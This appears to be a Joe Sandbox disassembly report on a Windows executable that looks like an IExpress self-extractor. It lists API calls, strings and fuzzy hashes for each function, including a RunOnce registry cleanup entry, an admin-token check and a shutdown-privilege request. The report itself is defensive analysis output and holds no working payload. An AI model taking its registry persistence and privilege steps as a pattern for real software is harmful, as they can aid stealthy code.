Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: abc4c97f5f42ed7f12dcd09e53bfd262ae8fa734f7fc942523b5dc7f340ae745
Instruction ID: a199f53667b4211606b7c79d44ec328110674c918eb9ce7e6c90a60196846743
Opcode Fuzzy Hash: abc4c97f5f42ed7f12dcd09e53bfd262ae8fa734f7fc942523b5dc7f340ae745
Instruction Fuzzy Hash: 60F0F471940B099E87618E399E03F53BBE4AAD63E13140D2E946FD2190DB31B942FBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC66AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,00FC4777,?,00FC4E38,?), ref: 00FC66B1

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a89d929eab25ee13bdb51f29ac5d20e48e15a9654902b016b84a97d30d03055a
Instruction ID: 923d1ff069a9b0ca536806d5d6974e7e2ddaf569c24122e53506fe4d670dee1e
Opcode Fuzzy Hash: a89d929eab25ee13bdb51f29ac5d20e48e15a9654902b016b84a97d30d03055a
Instruction Fuzzy Hash: 7EB09276666449426A2006316D2AA563841A6C123A7E41B94F032C11E0CA3ED846F004

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00FC4CAA

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 34c754da8b32c224c4972fd0f8f65695325da228e23fc8c97779fd6ab42d86a5
Instruction ID: 1d32af8afaa185ca2500993780e99b756739152d7ecd09578967b777e5ca77e1
Opcode Fuzzy Hash: 34c754da8b32c224c4972fd0f8f65695325da228e23fc8c97779fd6ab42d86a5
Instruction Fuzzy Hash: 71B0123208420CB7CF001FC2EC0AF853F1DE7C47A5F140040F60C460508A72A4109696

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 00FC4CC8

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 842d62c0c8cf9dff872b3c0ddd818b2f42d3abb3576ce038ba4788f7c9028983
Instruction ID: fb4433fa766f4dd4821342bfa6e23bbad72e2d399c0f8a51905e64ce9ecc7070
Opcode Fuzzy Hash: 842d62c0c8cf9dff872b3c0ddd818b2f42d3abb3576ce038ba4788f7c9028983
Instruction Fuzzy Hash: 30B0123104010CB78F001B42ED09C453F1DD6C02A47000050F50C420218B33A8119585

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00FC5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00FC5CEE
GetModuleFileNameA.KERNEL32(00FC8B3E,00000104,00000000,?,?), ref: 00FC5DFC
CharUpperA.USER32(?), ref: 00FC5E3E
CharUpperA.USER32(-00000052), ref: 00FC5EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00FC5F6F
CharUpperA.USER32(?), ref: 00FC5FA7
CharUpperA.USER32(-0000004E), ref: 00FC6008
CharUpperA.USER32(?), ref: 00FC60AA
CloseHandle.KERNEL32(00000000,00FC1140,00000000,00000040,00000000), ref: 00FC61F1
ExitProcess.KERNEL32 ref: 00FC61F8

Strings

RegServer, xrefs: 00FC5F66
", xrefs: 00FC5D78
", xrefs: 00FC612D
:, xrefs: 00FC6118

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 1ffca3b55c95365d97d7aa7e59225f5a790becce35b8e77615454374be0f86e8
Instruction ID: dc4252090fca6969c2c0eaa8b08c88cc58f8d4b83c6b7854683b6d1645668b32
Opcode Fuzzy Hash: 1ffca3b55c95365d97d7aa7e59225f5a790becce35b8e77615454374be0f86e8
Instruction Fuzzy Hash: E5D15831E08A5B5ADB358B388F4BFB93761A716B64F1400ADC486D7151DA74AEC6FB00

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00FC1EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00FC1F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00FC1FD3

Strings

SeShutdownPrivilege, xrefs: 00FC1F28

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 5d8026166d80f21ddfbbd99743f6ee7dd08e0cf05feff88443d07a97301f9c22
Instruction ID: d00106ebe93f53b7846cf5b9bfbbaf4acd2a028dfe4ff96df8d1228029a3316f
Opcode Fuzzy Hash: 5d8026166d80f21ddfbbd99743f6ee7dd08e0cf05feff88443d07a97301f9c22
Instruction Fuzzy Hash: 6021BC71E4020A6BDB209BA19E4BF7F76BCFB86754F24001DFA02D7182D7759811F661

Uniqueness

Uniqueness Score: -1.00%

Function 00FC17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00FC18DD), ref: 00FC181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00FC182C
AllocateAndInitializeSid.ADVAPI32(00FC18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FC18DD), ref: 00FC1855
FreeSid.ADVAPI32(?,?,?,?,00FC18DD), ref: 00FC1883
FreeLibrary.KERNEL32(00000000,?,?,?,00FC18DD), ref: 00FC188A

Strings

CheckTokenMembership, xrefs: 00FC1826
advapi32.dll, xrefs: 00FC1810

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: ba2742132a95711125190e7056e8e708f165b12b63dcb8b29d0df96703f90d6e
Instruction ID: fae12f22bcef597e2cd85c47c6fb35e8e5da2f18a37634420c035a6f7d490906
Opcode Fuzzy Hash: ba2742132a95711125190e7056e8e708f165b12b63dcb8b29d0df96703f90d6e
Instruction Fuzzy Hash: F6117F71E4020EABDB109FA4DE4BEBEBB78FB45755F10016DFA01E3291DA309D14AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC7155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00FC7182
GetCurrentProcessId.KERNEL32 ref: 00FC7191
GetCurrentThreadId.KERNEL32 ref: 00FC719A
GetTickCount.KERNEL32 ref: 00FC71A3
QueryPerformanceCounter.KERNEL32(?), ref: 00FC71B8

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 2989158878e0c052878ea874abf35378660888a1d6baa25390234b5ad3ae6446
Instruction ID: 42ffdc8137579e30a1ad5173e8ff8878c4182adb7c01b9423f7eb2bca3aabdb4
Opcode Fuzzy Hash: 2989158878e0c052878ea874abf35378660888a1d6baa25390234b5ad3ae6446
Instruction Fuzzy Hash: A211F871D0520C9BCB10DFB8DB4AA9EB7F4EB58315F654859D805E7214EB309A05AF41

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6CF0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FC6E26,00FC1000), ref: 00FC6CF7
UnhandledExceptionFilter.KERNEL32(00FC6E26,?,00FC6E26,00FC1000), ref: 00FC6D00
GetCurrentProcess.KERNEL32(C0000409,?,00FC6E26,00FC1000), ref: 00FC6D0B
TerminateProcess.KERNEL32(00000000,?,00FC6E26,00FC1000), ref: 00FC6D12

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: abe571c81e3bae26dfea3f61fbfd66790663c64d0551505e1b88e8c1957d23f2
Instruction ID: d1e5a2c6be7beb8184cf60189f15369674817688c8cf72ea54ac18c94843103b
Opcode Fuzzy Hash: abe571c81e3bae26dfea3f61fbfd66790663c64d0551505e1b88e8c1957d23f2
Instruction Fuzzy Hash: 32D0C93200010CBFDB002BF1EE0EE593F28EB4821AF4D4000F319C3021CA326451AF52

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6F40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00006EF0), ref: 00FC6F45

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5ed493a7cd65ff59b536e6bfa2c885e6e289a8d7c9ad722cb8fe4bb0df8467e8
Instruction ID: 09e99174a2c9a802a29fa498697928102a49bd5bd800cc2a6a24e146739d04fd
Opcode Fuzzy Hash: 5ed493a7cd65ff59b536e6bfa2c885e6e289a8d7c9ad722cb8fe4bb0df8467e8
Instruction Fuzzy Hash: 3F9002742551094797101B709F1BD1576915B4D606B865465A011C5495DB6090407917

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON

Download Yara Rule

APIs

LoadStringA.USER32(000003E8,00FC8598,00000200), ref: 00FC3271
GetDesktopWindow.USER32 ref: 00FC33E2
SetWindowTextA.USER32(?,smo), ref: 00FC33F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00FC3410
GetDlgItem.USER32(?,00000836), ref: 00FC3426
EnableWindow.USER32(00000000), ref: 00FC342D
EndDialog.USER32(?,00000000), ref: 00FC343F

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC32E2, 00FC32E7, 00FC3331, 00FC3344, 00FC335B, 00FC336A
smo, xrefs: 00FC33F1

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$smo
API String ID: 2418873061-1076603444
Opcode ID: 682540de6046784f82ce69df2d1c29feb37bf4005a6e99b674cf505a388c4a61
Instruction ID: 7826bf2a2d80808ca180dd090f33d76432ac845b2d6045d78731bb4d764a3157
Opcode Fuzzy Hash: 682540de6046784f82ce69df2d1c29feb37bf4005a6e99b674cf505a388c4a61
Instruction Fuzzy Hash: 8D512B3074028B7AEB255B355F4FFBB39589B86BE4F14C02CF645971D1CAB8DA01B261

Uniqueness

Uniqueness Score: -1.00%

Function 00FC34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000), ref: 00FC3535
EndDialog.USER32(?,?), ref: 00FC3541
ResetEvent.KERNEL32 ref: 00FC355F
SetEvent.KERNEL32(00FC1140,00000000,00000020,00000004), ref: 00FC3590
GetDesktopWindow.USER32 ref: 00FC35C7
GetDlgItem.USER32(?,0000083B), ref: 00FC35F1
SendMessageA.USER32(00000000), ref: 00FC35F8
GetDlgItem.USER32(?,0000083B), ref: 00FC3610
SendMessageA.USER32(00000000), ref: 00FC3617
SetWindowTextA.USER32(?,smo), ref: 00FC3623
CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00FC8798), ref: 00FC3637
EndDialog.USER32(?,00000000), ref: 00FC3671

Strings

smo, xrefs: 00FC361D

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: smo
API String ID: 2406144884-2762499640
Opcode ID: feb113a28b7797f46a3c76181f160480beb081c8c9a19caf4abe0d3211e6adda
Instruction ID: 08441bb703784dec0d123d4b1aa52142b977f57894fd9da8056b21222eecb8e8
Opcode Fuzzy Hash: feb113a28b7797f46a3c76181f160480beb081c8c9a19caf4abe0d3211e6adda
Instruction Fuzzy Hash: 3231B33164031BBBD7201F25AF1FF2A3A68E785B94F18891DF602972A0CA75A911FF51

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00FC4236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00FC424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00FC4263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00FC427A
GetTempPathA.KERNEL32(00000104,00FC88C0,?,00000001), ref: 00FC429F
CharPrevA.USER32(00FC88C0,01F91181,?,00000001), ref: 00FC42C2
CharPrevA.USER32(00FC88C0,00000000,?,00000001), ref: 00FC42D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00FC4391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00FC43A5

Strings

SHGetPathFromIDList, xrefs: 00FC4274
SHELL32.DLL, xrefs: 00FC422F
SHBrowseForFolder, xrefs: 00FC4246

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 40bb546f9c80a3751b0473dcef090946aaad8b34ec8b7681a6f4d7486221a764
Instruction ID: e149953d6190ebbe69e5e9ab20b85b40211971979b125e44e6534bcf2a16fc95
Opcode Fuzzy Hash: 40bb546f9c80a3751b0473dcef090946aaad8b34ec8b7681a6f4d7486221a764
Instruction Fuzzy Hash: 5D41E474E0024AAFD7119B70DEABFAE7BB4EB45394F04016DE941A3291CB74AC02F761

Uniqueness

Uniqueness Score: -1.00%

Function 00FC44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON

Download Yara Rule

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
MessageBoxA.USER32(?,?,smo,00010010), ref: 00FC4554
LocalAlloc.KERNEL32(00000040,00000065), ref: 00FC45A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 00FC45E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 00FC460D
MessageBeep.USER32(00000000), ref: 00FC4630
MessageBoxA.USER32(?,00000000,smo,00000000), ref: 00FC4666
LocalFree.KERNEL32(00000000), ref: 00FC466F

Part of subcall function 00FC681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00FC686E
Part of subcall function 00FC681F: GetSystemMetrics.USER32(0000004A), ref: 00FC68A7
Part of subcall function 00FC681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00FC68CC
Part of subcall function 00FC681F: RegQueryValueExA.ADVAPI32(?,00FC1140,00000000,?,?,0000000C), ref: 00FC68F4
Part of subcall function 00FC681F: RegCloseKey.ADVAPI32(?), ref: 00FC6902

Strings

LoadString() Error. Could not load string resource., xrefs: 00FC44E4
smo, xrefs: 00FC4545, 00FC465A

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$smo
API String ID: 3244514340-2161240188
Opcode ID: 5e99121f202ff482c5afc338f6c58ceca99f7501b06228bd97d0476c68c51ce4
Instruction ID: f5c1c8612150abe30ffc154b698165042f316bb64c2a0241961189b3983dfb67
Opcode Fuzzy Hash: 5e99121f202ff482c5afc338f6c58ceca99f7501b06228bd97d0476c68c51ce4
Instruction Fuzzy Hash: F3512572D0011AAFDB219F28CE5AFAABB68EF45314F184598FC19A3241DB35ED05FB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON

Download Yara Rule

APIs

CharUpperA.USER32(CD01772F,00000000,00000000,00000000), ref: 00FC27A8
CharNextA.USER32(0000054D), ref: 00FC27B5
CharNextA.USER32(00000000), ref: 00FC27BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC2829
RegQueryValueExA.ADVAPI32(?,00FC1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC2852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC2870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC28A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00FC28AA
GetSystemDirectoryA.KERNEL32(-00000005,00000104), ref: 00FC28B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00FC27E4

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 09d03e47b8f18a22ef6d1a84836d062fde92576a097bcc5307abd9f55408753a
Instruction ID: fcb4559181d3dbf59c61347cf3a0b362dacd954e7f46da9bafbcde43dfe3bf7b
Opcode Fuzzy Hash: 09d03e47b8f18a22ef6d1a84836d062fde92576a097bcc5307abd9f55408753a
Instruction Fuzzy Hash: 4141C171E0012DAFDB249B249E86FEA7BBCEB15310F0400AAF545D2140CB749E85AFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00FC22A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00FC22D8
memset.MSVCRT ref: 00FC22F5
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00FC2305
RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00FC236E
RegCloseKey.ADVAPI32(?), ref: 00FC237A

Strings

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00FC232D
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC2321
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00FC2299
wextract_cleanup0, xrefs: 00FC227C, 00FC22CD, 00FC2363

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
API String ID: 3027380567-2036266374
Opcode ID: aa7aed400dbf3021b8708fb0e586557cbc81758f6f8a577ecd176ed7ef797a9f
Instruction ID: b3fc3e64cde0698736bb07a79ed55e701832778493164c90f80e276749488666
Opcode Fuzzy Hash: aa7aed400dbf3021b8708fb0e586557cbc81758f6f8a577ecd176ed7ef797a9f
Instruction Fuzzy Hash: EC31E371A0021DABDB219B20DE4BFEA7B7CEF54750F0401ADB50DE7041EA75AB89EA50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000000), ref: 00FC313B
